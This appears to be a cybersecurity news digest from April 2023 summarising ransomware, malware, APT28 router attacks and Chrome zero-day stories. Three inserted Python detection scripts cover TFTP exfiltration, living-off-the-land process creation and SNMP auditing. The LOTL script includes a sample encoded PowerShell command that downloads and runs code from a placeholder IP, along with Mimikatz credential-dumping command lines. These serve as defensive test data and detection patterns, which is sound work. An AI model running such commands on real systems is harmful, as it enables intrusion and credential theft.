Autosummary: To maximize the benefits of AI technologies and minimize risks, we recommend that Boards work with the CISO to take a three-pronged approach to secure, scale, and evolve: deploy secure AI systems, leverage the power of AI to achieve better cybersecurity outcomes at scale, and stay informed on developments in this space to anticipate threats. To better balance the scale, Boards must encourage deeper collaboration between the C-Suite (especially the Chief Information Security Officer, Chief Information Officer, Chief Technology Officer, and Chief Compliance Officer) as well as business leaders, to build better security into all products and services versus security being an add-on.


                LockBit Ransomware Now Targeting Apple macOS Devices

                exploits ransomware
                2023-04-18 https://thehackernews.com/2023/04/lockbit-ransomware-now-targeting-apple.html
Threat actors behind the LockBit ransomware operation have developed new artifacts that can encrypt files on devices running Apple's macOS operating system. The development, which was reported by the MalwareHunterTeam over the weekend, appears to be the first time a big-game ransomware crew has created a macOS-based payload. Additional samples identified by vx-underground show that the macOS [...]

Autosummary: Wardle also pointed out additional safeguards implemented by Apple, such as System Integrity Protection (SIP) and Transparency, Consent, and Control (TCC), that prevent the execution of unauthorized code and require apps to seek users' permission to access protected files and data.


                Goldoson Android Malware Infects Over 100 Million Google Play Store Downloads

                exploits
                2023-04-18 https://thehackernews.com/2023/04/goldoson-android-malware-infects-over.html
A new Android malware strain named Goldoson has been detected in the official Google Play Store spanning more than 60 legitimate apps that collectively have over 100 million downloads. An additional eight million installations have been tracked through ONE store, a leading third-party app storefront in South Korea. The rogue component is part of a third-party software library used by the apps in [...]

Autosummary: [...] Lotte Cinema (롯데시네마), Genie Music (지니뮤직 - genie), Cultureland [Culture Cash] (컬쳐랜드[컬쳐캐쉬]), GOM Player, Megabox (메가박스, removed), and LIVE Score, Real-Time Score. The findings highlight the need for app developers to be transparent about the dependencies used in their software, not to mention take adequate steps to safeguard users' information against such abuse.


                The intricate relationships between the FIN7 group and members of the Conti ransomware gang

                exploits ransomware
                2023-04-18 https://securityaffairs.com/144943/cyber-crime/relationships-fin7-conti-ransomware.html

                A new malware, dubbed Domino, developed by the FIN7 cybercrime group has been used by the now-defunct Conti ransomware gang. IBM Security X-Force researchers recently discovered a new malware family, called Domino, which was created by developers associated with the FIN7 cybercriminal group (tracked by X-Force as ITG14). FIN7 is a Russian criminal group (aka Carbanak) that has […]

The post The intricate relationships between the FIN7 group and members of the Conti ransomware gang appeared first on Security Affairs.


                Australians lost a record $3.1 billion to scams last year

                financial
                2023-04-18 https://www.bleepingcomputer.com/news/security/australians-lost-a-record-31-billion-to-scams-last-year/
The Australian Competition & Consumer Commission (ACCC) says Australians lost a record $3.1 billion to scams in 2022, an 80% increase over the total losses recorded in 2021. [...]

Autosummary: Most of the losses concern investment scams, which accounted for $1.5 billion, followed by remote access scams that resulted in losses of $229 million, and payment redirection scams that cost victims another $224 million.


                New sandbox escape PoC exploit available for VM2 library, patch now

                exploits
                2023-04-18 https://www.bleepingcomputer.com/news/security/new-sandbox-escape-poc-exploit-available-for-vm2-library-patch-now/
Security researchers have released yet another sandbox escape proof of concept (PoC) exploit that makes it possible to execute unsafe code on the host running the VM2 sandbox. [...]

Autosummary: [Image: PoC released by the researcher (GitHub)] All users, package maintainers, and software developers whose projects incorporate the VM2 library are recommended to upgrade to version 3.9.17, which addresses the security flaw, as soon as possible.


                KOTRA and KISIA will showcase 10 Korean cybersecurity companies at RSA Conference 2023

                ciber
                2023-04-18 https://www.helpnetsecurity.com/2023/04/18/korean-cybersecurity-companies-rsa-conference/

Korea Trade-Investment Promotion Agency (KOTRA) will host 10 Korean cybersecurity companies as Korea Pavilion with Korea Information Security Industry Association (KISIA) at RSA Conference 2023. KOTRA and KISIA will feature companies from across a range of fields including network security, cloud security, identity and access management and more. Additionally, KOTRA and KISIA will hold a networking event with Korean cybersecurity companies, local investors, and invited Korea Pavilion attendees from RSAC 2023 on the last … More

The post KOTRA and KISIA will showcase 10 Korean cybersecurity companies at RSA Conference 2023 appeared first on Help Net Security.


                YouTube Videos Distributing Aurora Stealer Malware via Highly Evasive Loader

                exploits
                2023-04-18 https://thehackernews.com/2023/04/youtube-videos-distributing-aurora.html
Cybersecurity researchers have detailed the inner workings of a highly evasive loader named "in2al5d p3in4er" (read: invalid printer) that's used to deliver the Aurora information stealer malware. "The in2al5d p3in4er loader is compiled with Embarcadero RAD Studio and targets endpoint workstations using advanced anti-VM (virtual machine) technique," cybersecurity firm Morphisec said in a report [...]

Autosummary: "Those with the lowest detection rate on VirusTotal are compiled using 'BCC64.exe,' a new Clang based C++ compiler from Embarcadero," the Israeli cybersecurity company said, pointing out its ability to evade sandboxes and virtual machines.


                CISA adds bugs in Chrome and macOS to its Known Exploited Vulnerabilities catalog

                exploits
                2023-04-18 https://securityaffairs.com/144967/security/cisa-chrome-macos-known-exploited-vulnerabilities-catalog.html

                US Cybersecurity and Infrastructure Security Agency (CISA) added Chrome and macOS vulnerabilities to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to […]

The post CISA adds bugs in Chrome and macOS to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.


                Microsoft: Iranian hackers behind retaliatory cyberattacks on US orgs

                ciber
                2023-04-18 https://www.bleepingcomputer.com/news/security/microsoft-iranian-hackers-behind-retaliatory-cyberattacks-on-us-orgs/
Microsoft has discovered that an Iranian hacking group known as "Mint Sandstorm" is conducting cyberattacks on US critical infrastructure in what is believed to be retaliation for recent attacks on Iran's infrastructure. [...]

Autosummary: Microsoft recommends using attack surface reduction rules to block executables that do not meet specific criteria:
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Block Office applications from creating executable content
- Block process creations originating from PSExec and WMI commands

As the threat actors heavily rely on vulnerabilities for initial access to corporate networks, Microsoft recommends that organizations apply security updates as soon as possible.


                US, UK warn of govt hackers using custom malware on Cisco routers

                exploits
                2023-04-18 https://www.bleepingcomputer.com/news/security/us-uk-warn-of-govt-hackers-using-custom-malware-on-cisco-routers/
The US, UK, and Cisco are warning of Russian state-sponsored APT28 hackers deploying a custom malware named "Jaguar Tooth" on Cisco IOS routers, allowing unauthenticated access to the device. [...]

Autosummary: In addition, the malware creates a new process named "Service Policy Lock" that collects the output from the following Command Line Interface (CLI) commands and exfiltrates it using TFTP:
- show running-config
- show version
- show ip interface brief
- show arp
- show cdp neighbors
- show start
- show ip route
- show flash

All Cisco admins should upgrade their routers to the latest firmware to mitigate these attacks.
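The exfiltration channel described above, router-side "show" output pushed out over TFTP, is something a network team can watch for in flow data: routers have a small, known set of TFTP servers they should ever talk to, so any other TFTP destination is worth a look. The Python below is an added example written for this digest, not code from BleepingComputer, Cisco or the joint advisory. The flow-record layout, the router management prefixes and the TFTP allowlist are assumptions, and the flow lines are constructed.

```python
"""Flag routers that push data out over TFTP to hosts that are not approved
TFTP servers (the channel Jaguar Tooth uses for its 'show' output).
Added example, not code from the article or the advisory; the flow format,
router prefixes and allowlist below are assumptions."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumed: prefixes where the organisation's Cisco IOS routers are addressed
ROUTER_PREFIXES = [ip_network("10.0.0.0/24"), ip_network("10.0.1.0/24")]
# Assumed: the only TFTP servers routers should ever talk to (config backups, images)
TFTP_ALLOWLIST = {ip_address("10.0.0.250")}

# Constructed flow records: src,dst,proto,dport,bytes (one flow per line)
SAMPLE_FLOWS = """\
10.0.0.1,10.0.0.250,udp,69,1840
10.0.0.1,198.51.100.23,udp,69,52213
10.0.0.2,198.51.100.23,udp,69,48870
10.0.1.7,10.0.0.250,udp,69,2200
10.0.0.3,203.0.113.9,udp,161,512
192.0.2.10,198.51.100.23,udp,69,1000
"""


def parse_flows(text):
    """Turn the CSV-style flow lines into dicts with typed addresses and ports."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, proto, dport, nbytes = line.split(",")
        flows.append({"src": ip_address(src), "dst": ip_address(dst),
                      "proto": proto.lower(), "dport": int(dport), "bytes": int(nbytes)})
    return flows


def is_router(addr):
    return any(addr in net for net in ROUTER_PREFIXES)


def find_suspicious_tftp(flows):
    """Group router->TFTP flows by destination, ignoring allowlisted servers.

    Returns {dst: {"routers": [src, ...], "bytes": total}}; one destination
    receiving TFTP from several routers is the pattern worth escalating."""
    hits = defaultdict(lambda: {"routers": set(), "bytes": 0})
    for f in flows:
        if f["proto"] != "udp" or f["dport"] != 69:
            continue  # not TFTP
        if not is_router(f["src"]) or f["dst"] in TFTP_ALLOWLIST:
            continue  # not a router, or an approved TFTP server
        entry = hits[str(f["dst"])]
        entry["routers"].add(str(f["src"]))
        entry["bytes"] += f["bytes"]
    return {dst: {"routers": sorted(v["routers"]), "bytes": v["bytes"]}
            for dst, v in hits.items()}


if __name__ == "__main__":
    for dst, info in find_suspicious_tftp(parse_flows(SAMPLE_FLOWS)).items():
        print(f"{dst}: TFTP from {len(info['routers'])} router(s) {info['routers']}, "
              f"{info['bytes']} bytes total")
```

On the constructed sample only 198.51.100.23 is reported: two routers sent it roughly 100 KB over UDP/69, while the backup server and the non-router source are ignored. In production the same logic runs over NetFlow/IPFIX exports, and a TFTP volume far above what a config backup needs is the second signal to add.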


                LockBit ransomware on Mac: Should we worry?

                exploits ransomware
                2023-04-18 https://www.malwarebytes.com/blog/news/2023/04/lockbit-ransomware-on-mac-should-we-worry

Categories: News, Ransomware

Tags: LockBit, ransomware, Patrick Wardle, macOS ransomware, first Mac ransomware, Azim Khodjibaev, BleepingComputer, Mark Stockley

With plans to offer more ransomware, LockBit has just created a variant for macOS. But, as experts have pointed out, it's hardly ready for anything.

The post LockBit ransomware on Mac: Should we worry? appeared first on Malwarebytes Labs.

Autosummary: "For most organizations, the main takeaway is Macs are probably safe, for now, but your Windows servers were always the prime target anyway," says Malwarebytes Security Evangelist Mark Stockley. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. [Image source: Objective-See] The encryptor is likely a test file. Azim Khodjibaev (@AShukuhi), a security researcher at Cisco Talos, floated the theory to BleepingComputer that the encryptors designed for macOS were "meant as a test and were never intended for development in live cyberattacks."


                Payment giant"s point-of-sale outage caused by ALPHV ransomware

                exploits ransomware
                2023-04-18 https://www.malwarebytes.com/blog/news/2023/04/payment-giants-point-of-sale-outage-caused-by-alphv-ransomware

Categories: News, Ransomware

Tags: NCR, Aloha, ALPHV, BlackCat, ransomware

                An issue with the NCR Aloha point-of-sale system turned out to be a ransomware attack claimed by the ALPHV group

The post Payment giant's point-of-sale outage caused by ALPHV ransomware appeared first on Malwarebytes Labs.

Autosummary: On April 12, 2023, payment giant NCR reported it was looking into an issue with its point-of-sale (POS) systems that caused an outage, leaving customers unable to use the system. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. [...] "We will give you this list after payment," [...] The ransomware-as-a-service (RaaS) group ALPHV, also known as BlackCat or Noberus, is currently one of the most active.


                AI verification systems give businesses an edge over scammers

                financial
                2023-04-17 https://www.helpnetsecurity.com/2023/04/17/fraudulent-verification-attempts/

                Fraudsters are underestimating the power of AI to detect fake IDs, according to a new report from Ondato. Based on an analysis of millions of ID verifications carried out for its customers in 2022, Ondato found that ID cards were used in 52% of fraudulent verification attempts – far ahead of driving licences (29%) and passports (18%). ID cards used in over half of fraudulent verification attempts According to Ondato, fraudsters most likely underestimate ID … More

The post AI verification systems give businesses an edge over scammers appeared first on Help Net Security.

Autosummary: As well as banks and other financial institutions, this can include cryptocurrency marketplaces, gambling services companies, lawyers and notaries, accountants and audit advisors, auction houses and antique dealers.


                Vice Society Ransomware Using Stealthy PowerShell Tool for Data Exfiltration

                exploits ransomware
                2023-04-17 https://thehackernews.com/2023/04/vice-society-ransomware-using-stealthy.html
Threat actors associated with the Vice Society ransomware gang have been observed using a bespoke PowerShell-based tool to fly under the radar and automate the process of exfiltrating data from compromised networks. "Threat actors (TAs) using built-in data exfiltration methods like [living off the land binaries and scripts] negate the need to bring in external tools that might be flagged by [...]

Autosummary: "Threat actors (TAs) using built-in data exfiltration methods like [living off the land binaries and scripts] negate the need to bring in external tools that might be flagged by security software and/or human-based security detection mechanisms," Palo Alto Networks Unit 42 researcher Ryan Chapman said.


                New QBot email attacks use PDF and WSF combo to install malware

                exploits
                2023-04-17 https://www.bleepingcomputer.com/news/security/new-qbot-email-attacks-use-pdf-and-wsf-combo-to-install-malware/
QBot malware is now distributed in phishing campaigns utilizing PDFs and Windows Script Files (WSF) to infect Windows devices. [...]

Autosummary: [Image: QBot phishing email. Source: BleepingComputer] Attached to these emails is a PDF file named "CancelationLetter-[number].pdf" that, when opened, displays a message stating, "This document contains protected files, to display them, click on the 'open' button."


                New Chameleon Android malware mimics bank, govt, and crypto apps

                financial exploits industry
                2023-04-17 https://www.bleepingcomputer.com/news/security/new-chameleon-android-malware-mimics-bank-govt-and-crypto-apps/
A new Android trojan called "Chameleon" has been targeting users in Australia and Poland since the start of the year, mimicking the CoinSpot cryptocurrency exchange, an Australian government agency, and the IKO bank. [...]

Autosummary: [Image: Requesting permission to use the Accessibility Service (Cyble)] At first connection with the C2, Chameleon sends the device version, model, root status, country, and precise location, probably to profile the new infection.


                New QBot Banking Trojan Campaign Hijacks Business Emails to Spread Malware

                financial exploits
                2023-04-17 https://thehackernews.com/2023/04/new-qbot-banking-trojan-campaign.html
A new QBot malware campaign is leveraging hijacked business correspondence to trick unsuspecting victims into installing the malware, new findings from Kaspersky reveal. The latest activity, which commenced on April 4, 2023, has primarily targeted users in Germany, Argentina, Italy, Algeria, Spain, the U.S., Russia, France, the U.K., and Morocco. QBot (aka Qakbot or Pinkslipbot) is a banking [...]



                FIN7 and Ex-Conti Cybercrime Gangs Join Forces in Domino Malware Attacks

                exploits
                2023-04-17 https://thehackernews.com/2023/04/fin7-and-ex-conti-cybercrime-gangs-join.html
A new strain of malware developed by threat actors likely affiliated with the FIN7 cybercrime group has been put to use by the members of the now-defunct Conti ransomware gang, indicating collaboration between the two crews. The malware, dubbed Domino, is primarily designed to facilitate follow-on exploitation on compromised systems, including delivering a lesser-known information stealer that [...]

Autosummary: This next-stage artifact is a second loader codenamed Domino Loader, which harbors an encrypted .NET information stealer referred to as Project Nemesis that's capable of amassing sensitive data from clipboard, Discord, web browsers, crypto wallets, VPN services, and other apps.


                Ex-Conti members and FIN7 devs team up to push new Domino malware

                exploits
                2023-04-17 https://www.bleepingcomputer.com/news/security/ex-conti-members-and-fin7-devs-team-up-to-push-new-domino-malware/
Ex-Conti ransomware members have teamed up with the FIN7 threat actors to distribute a new malware family named "Domino" in attacks on corporate networks. [...]

Autosummary: For example, TrickBot, Emotet, BazarBackdoor, and QBot (QakBot) have a long history of providing initial access to ransomware operations, such as REvil, Maze, Egregor, BlackBasta, Ryuk, and Conti.


                Google urges users to update Chrome to address zero-day vulnerability

                exploits
                2023-04-17 https://www.csoonline.com/article/3693259/google-urges-users-to-update-chrome-to-address-zero-day-vulnerability.html#tk.rss_security
Google has released Chrome version 112.0.5615.121 to address a vulnerability that can allow malicious code execution on Windows, Mac, and Linux systems.

Autosummary: A type confusion error occurs when a program uses one type of method to allocate or initialize a resource but uses another method to access that resource, leading to an out-of-bounds memory access, according to cybersecurity firm NSFocus, in an alert it sent about Chrome's December update.


                Living Off the Land (LOTL) attacks: Detecting ransomware gangs hiding in plain sight

                exploits ransomware
                2023-04-17 https://www.malwarebytes.com/blog/business/2023/04/living-off-the-land-lotl-attacks-detecting-ransomware-gangs-hiding-in-plain-sight

                Categories: Business

                Good tools gone bad.

The post Living Off the Land (LOTL) attacks: Detecting ransomware gangs hiding in plain sight appeared first on Malwarebytes Labs.

Autosummary:

Tool | Used for | Used to | Used by
PowerShell | Versatile scripting language and shell framework for Windows systems | Execute malicious scripts, maintain persistence, and evade detection | LockBit, Vice Society, Royal, BianLian, ALPHV, Black Basta
PsExec | Lightweight command-line tool for executing processes on remote systems | Execute commands or payloads via a temporary Windows service | LockBit, Royal, ALPHV, Play, BlackByte
WMI | Admin feature for accessing and managing Windows system components | Execute malicious commands and payloads remotely | LockBit, Vice Society, Black Basta, Dark Power, Cl0p, BianLian
Mimikatz | Open source tool for Windows security and credential management | Extract credentials from memory and perform privilege escalation | LockBit, Black Basta, Cuba, ALPHV
Cobalt Strike | Commercial pen test tool to assess network security and simulate advanced threat actor tactics | Command and control, lateral movement, and exfiltration of sensitive data | LockBit, Black Basta, Royal, ALPHV, Play, Cuba, Vice Society

Again, readers of our monthly ransomware review will recognize that each gang listed here is responsible for the lion's share of yearly ransomware attacks. In order to truly protect ourselves from RaaS gangs, we have to 'peel back the onion', so to speak, and get a closer look at how, exactly, they behave. In short, by continuously analyzing network and system data, identifying potential weak points, and anticipating attacker tactics, IT teams can begin to get the upper hand against RaaS gangs that employ LOTL techniques.
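Each tool in the table leaves a recognisable trace in process-creation telemetry, and that is where practical LOTL detection starts: PsExec installs its PSEXESVC service on the target, remote WMI execution makes WmiPrvSE.exe the parent of a shell, and PowerShell abuse almost always shows up as an encoded command or a download cradle. The Python below is an added example written for this digest, not code from Malwarebytes. It applies four rules to constructed events shaped like Sysmon Event ID 1 / Windows 4688 fields; the field names, host names and sample command lines are assumptions. It also covers the Vice Society entry above, where a PowerShell script is the exfiltration tool.

```python
"""Rule-based detection of living-off-the-land process creations
(PsExec, WMI-spawned shells, encoded/download-cradle PowerShell, Mimikatz).
Added example, not code from Malwarebytes; event field names, host names
and the sample events are constructed."""
import base64
import ntpath
import re

# The encoded PowerShell payload is built here so the sample stays readable.
ENCODED_PS = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/a')".encode("utf-16-le")
).decode()

# Constructed events shaped like Sysmon Event ID 1 / Windows 4688 fields
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\PSEXESVC.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\PSEXESVC.exe"},
    {"host": "srv02", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "cmd.exe /c whoami"},
    {"host": "ws03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED_PS}"},
    {"host": "dc01", "image": r"C:\Users\admin\Desktop\m.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "ws04", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe notes.txt"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe",
          "wscript.exe", "cscript.exe"}
# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob
PS_ENCODED = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
PS_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|\biex\b|invoke-expression|frombase64string")
# Mimikatz module::command syntax on the command line
MIMIKATZ = re.compile(r"(?i)sekurlsa::|privilege::debug|lsadump::|kerberos::")


def basename(path):
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    m = PS_ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the list of rule names the event triggers (empty if nothing fired)."""
    findings = []
    img = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    if img == "psexesvc.exe":
        findings.append("psexec_service_start")
    if parent == "wmiprvse.exe" and img in SHELLS:
        findings.append("wmi_spawned_shell")
    if img in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("powershell_encoded_command")
        # inspect both the raw command line and the decoded payload
        if PS_CRADLE.search(cmd + " " + (decoded or "")):
            findings.append("powershell_download_cradle")
    if MIMIKATZ.search(cmd):
        findings.append("mimikatz_module_syntax")
    return findings


def scan(events):
    """Map (host, image basename) -> findings for every event that trips a rule."""
    results = {}
    for e in events:
        findings = classify(e)
        if findings:
            results[(e["host"], basename(e["image"]))] = findings
    return results


if __name__ == "__main__":
    for (host, image), rules in scan(SAMPLE_EVENTS).items():
        print(f"{host}: {image} -> {', '.join(rules)}")
```

The notepad event produces nothing; the other four each trip the rule they were built to trip, and the PowerShell event trips two because the encoded payload is decoded before the cradle check runs. Decoding -EncodedCommand before matching is the step most cheap detections skip, and it is the one that keeps the rule working when the attacker wraps the download in base64.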


                Ransomware in Germany, April 2022 – March 2023

                exploits
                2023-04-17 https://www.malwarebytes.com/blog/threat-intelligence/2023/04/ransomware-review-germany

                Categories: News

                In the last 12 months, Germany was one of the most attacked countries in the world, the most attacked in the EU, and a favourite target of the notorious Black Basta group.

The post Ransomware in Germany, April 2022 – March 2023 appeared first on Malwarebytes Labs.

Autosummary: During that period:
- It was the fourth most attacked country in the world, and the most attacked in the EU
- The construction sector was harder hit than in the USA, UK, or France
- LockBit and Black Basta accounted for 54% of known attacks
- Black Basta attacked targets in Germany far more often than in the UK or France

In August 2022, German power semiconductor manufacturer Semikron disclosed a ransomware attack that had partially encrypted its network, with the attackers claiming to have stolen 2TB of documents. There were no known attacks on German healthcare in the last 12 months (which, again, does not include unknown attacks), the country suffered fewer attacks on its legal services than either the UK or France, and it does not seem to have suffered the same problems France has had protecting its government sector, or the UK its education sector.

[Figure: The ten most attacked countries between April 2022 - March 2023, ordered by attacks per capita]

As in most countries, the German services sector is the most hard hit, accounting for 28% of attacks in the last 12 months, just slightly above the global average of 25%.

[Figure: Known attacks in the ten most attacked countries between April 2022 - March 2023]

Given the disparity between the USA and the rest of the world in terms of number of attacks, it would be easy to conclude that ransomware is, first-and-foremost, a USA problem.

[Figure: Ransomware with two or more known attacks in Germany, April 2022 - March 2023]

In the last year, Black Basta and LockBit were the only ransomware that registered more than four known attacks in a month, with both going as high as eight.


                Update Chrome now! Google patches actively exploited flaw

                exploits
                2023-04-17 https://www.malwarebytes.com/blog/news/2023/04/update-chrome-now-google-patches-actively-exploited-flaw

Categories: Exploits and vulnerabilities, News

Tags: Google, Chrome zero-day, CVE-2023-2033, V8 flaw, V8

                Google has released an updated version of Chrome to address a zero-day flaw that is being exploited in the wild.

The post Update Chrome now! Google patches actively exploited flaw appeared first on Malwarebytes Labs.

Autosummary: In a recent security advisory, Google says it patched a high-severity zero-day security flaw in its Chrome browser—the first in 2023—currently being exploited in the wild by threat actors. The company urges all its Windows, Mac, and Linux users to update to version 112.0.5615.121 immediately, as this flaw is present in Chrome versions before this one.


                Woman tracks down and turns table on Airbnb scammer

                financial
                2023-04-17 https://www.malwarebytes.com/blog/news/2023/04/woman-tracks-down-and-turns-table-on-airbnb-scammer

Categories: News, Scams

Tags: Airbnb, TikTok, @livvoogus, Olivia, Mr. Tyler

A superhost scammed a woman out of a thousand dollars. She didn't take it lying down.

The post Woman tracks down and turns table on Airbnb scammer appeared first on Malwarebytes Labs.

Autosummary: "The person who had lived there got evicted because, according to the lease, you're not allowed to do Airbnbs out of the apartment, and he just never took the listing down," she said.


                Fake Chrome updates spread malware

                exploits
                2023-04-17 https://www.malwarebytes.com/blog/news/2023/04/fake-chrome-updates-spread-malware

Categories: News

Tags: chrome, browser, update, fake, malware, monero, miner, cryptocurrency, rogue, hacked, compromised, site, website

                We take a look at a slew of hacked websites pushing fake Chrome updates which are Monero miner malware in disguise.

The post Fake Chrome updates spread malware appeared first on Malwarebytes Labs.

Autosummary: How to update Chrome: updating your web browser, whether Chrome or something else, is incredibly easy to do. At best, you may open up your browser, see a message telling you that you're now running the latest version, and then go back to not having to think about it. However, a lot of folks out there will probably panic at the sight of the ZIP, assume something has gone horribly wrong with their browser, and open it up.


                TUC: Government failing to protect workers from AI

                government
                2023-04-17 https://www.bbc.co.uk/news/technology-65301630?at_medium=RSS&at_campaign=KARANGA
Union group claims using artificial intelligence to hire and fire staff could lead to greater discrimination.



                APT28 Exploits Known Vulnerability to Carry Out Reconnaissance and Deploy Malware on Cisco Routers

                exploits
                2023-04-17 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108

                APT28 accesses poorly maintained Cisco routers and deploys malware on unpatched devices using CVE-2017-6742.

                Overview and Context

                The UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI) are releasing this joint advisory to provide details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of Cisco routers in 2021.

                We assess that APT28 is almost certainly the Russian General Staff Main Intelligence Directorate (GRU) 85th special Service Centre (GTsSS) Military Intelligence Unit 26165. APT28 (also known as Fancy Bear, STRONTIUM, Pawn Storm, the Sednit Gang and Sofacy) is a highly skilled threat actor.


Autosummary: Previous Activity. The NCSC has previously attributed the following activity to APT28:
- Cyber attacks against the German parliament in 2015, including data theft and disrupting email accounts of German Members of Parliament (MPs) and the Vice Chancellor
- Attempted attack against the Organization for the Prohibition of Chemical Weapons (OPCW) in April 2018, to disrupt independent analysis of chemicals weaponized by the GRU in the UK

For more information on APT28 activity, see the advisories Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.

Reports: APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers (UK PDF, 366.88 KB); APT28 Exploits Known Vulnerability to Carry Out Reconnaissance and Deploy Malware on Cisco Routers (US PDF, 366.25 KB).

Reconnaissance: Use of SNMP Protocol to Access Routers. In 2021, APT28 used infrastructure to masquerade Simple Network Management protocol (SNMP) access into Cisco routers worldwide.
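The reconnaissance stage described above only works when SNMP is reachable from the outside and answers to a community string the attacker can obtain or guess, which is something that can be audited directly from the running configuration rather than discovered after the fact. The Python below is an added example written for this digest, not code from the NCSC/CISA advisory or from Cisco. It parses the snmp-server community lines of a constructed IOS config excerpt and flags v1/v2c communities, default strings, read-write access and communities with no access list; the config text and the list of "default" strings are assumptions.

```python
"""Audit a Cisco IOS running-config for the SNMP exposure APT28 abused:
reachable v1/v2c community strings, default strings, read-write access,
and communities with no access-list. Added example, not from the advisory
or Cisco; the config excerpt and the 'default' string list are assumptions."""
import re

# Constructed running-config excerpt
SAMPLE_CONFIG = """\
hostname edge-rtr-1
!
snmp-server community public RO
snmp-server community s3cr3t-rw RW
snmp-server community monitoring RO 10
snmp-server group NETMON v3 priv
!
access-list 10 permit 10.0.0.250
access-list 10 deny any log
"""

# snmp-server community <string> [view <name>] [RO|RW] [<acl>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?:\s+view\s+\S+)?(?:\s+(RO|RW))?(?:\s+(\S+))?\s*$", re.I)
V3_PRIV_RE = re.compile(r"^snmp-server group \S+ v3 priv", re.I | re.M)
# Assumed: community strings an attacker will try before anything else
DEFAULT_COMMUNITIES = {"public", "private", "cisco", "secret", "write", "read", "admin"}


def parse_communities(config_text):
    """Extract community string, RO/RW mode and ACL (None if absent) per line."""
    found = []
    for line in config_text.splitlines():
        m = COMMUNITY_RE.match(line.strip())
        if m:
            found.append({"community": m.group(1),
                          "mode": (m.group(2) or "RO").upper(),  # IOS defaults to RO
                          "acl": m.group(3)})
    return found


def audit_snmp(config_text):
    """Return per-community issues plus whether an SNMPv3 'priv' group exists."""
    findings = []
    for c in parse_communities(config_text):
        # every community line is v1/v2c: no authentication beyond the string itself
        issues = ["v1/v2c community: cleartext, authenticated only by the string itself"]
        if c["community"].lower() in DEFAULT_COMMUNITIES:
            issues.append("default/guessable community string")
        if c["mode"] == "RW":
            issues.append("read-write access (configuration can be changed)")
        if c["acl"] is None:
            issues.append("no access-list restricting SNMP sources")
        findings.append((c["community"], issues))
    return {"communities": findings,
            "v3_priv_configured": V3_PRIV_RE.search(config_text) is not None}


if __name__ == "__main__":
    report = audit_snmp(SAMPLE_CONFIG)
    for community, issues in report["communities"]:
        print(f"{community}:")
        for issue in issues:
            print(f"  - {issue}")
    print("SNMPv3 priv group configured:", report["v3_priv_configured"])
```

On the sample, "public" collects every finding, the RW string is flagged for write access and for having no ACL, and "monitoring" is left with only the inherent v1/v2c weakness because ACL 10 pins it to one management host. The practical remediation order follows the same list: remove default strings, drop RW communities, put an ACL on anything that remains, and move management to the SNMPv3 priv group the config already defines.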


                Snowflake Manufacturing Data Cloud improves supply chain performance

                industry
                2023-04-16 https://www.helpnetsecurity.com/2023/04/16/snowflake-manufacturing-data-cloud/

                Snowflake has launched the Manufacturing Data Cloud, which enables companies in automotive, technology, energy, and industrial sectors to unlock the value of their critical siloed industrial data by leveraging Snowflake’s data platform, Snowflake- and partner-delivered solutions, and industry-specific datasets. The Manufacturing Data Cloud empowers manufacturers to collaborate with partners, suppliers, and customers in a secure and scalable way, driving greater agility and visibility across the entire value chain. With Snowflake’s Manufacturing Data Cloud, organizations can … More

                The post Snowflake Manufacturing Data Cloud improves supply chain performance appeared first on Help Net Security.

                Autosummary: Powering smart manufacturing. Native support for semi-structured, structured, and unstructured high-volume Internet of Things (IoT) data in Snowflake enables manufacturers to keep operations running remotely by streamlining operations within and across manufacturing plants, while also leveraging shop floor data in near real-time to predict maintenance needs, analyze cycle time, improve product yield and quality, and meet sustainability goals.


                Week in review: Microsoft patches zero-day, Apple security updates, HashiCorp Vault vulnerability

                exploits
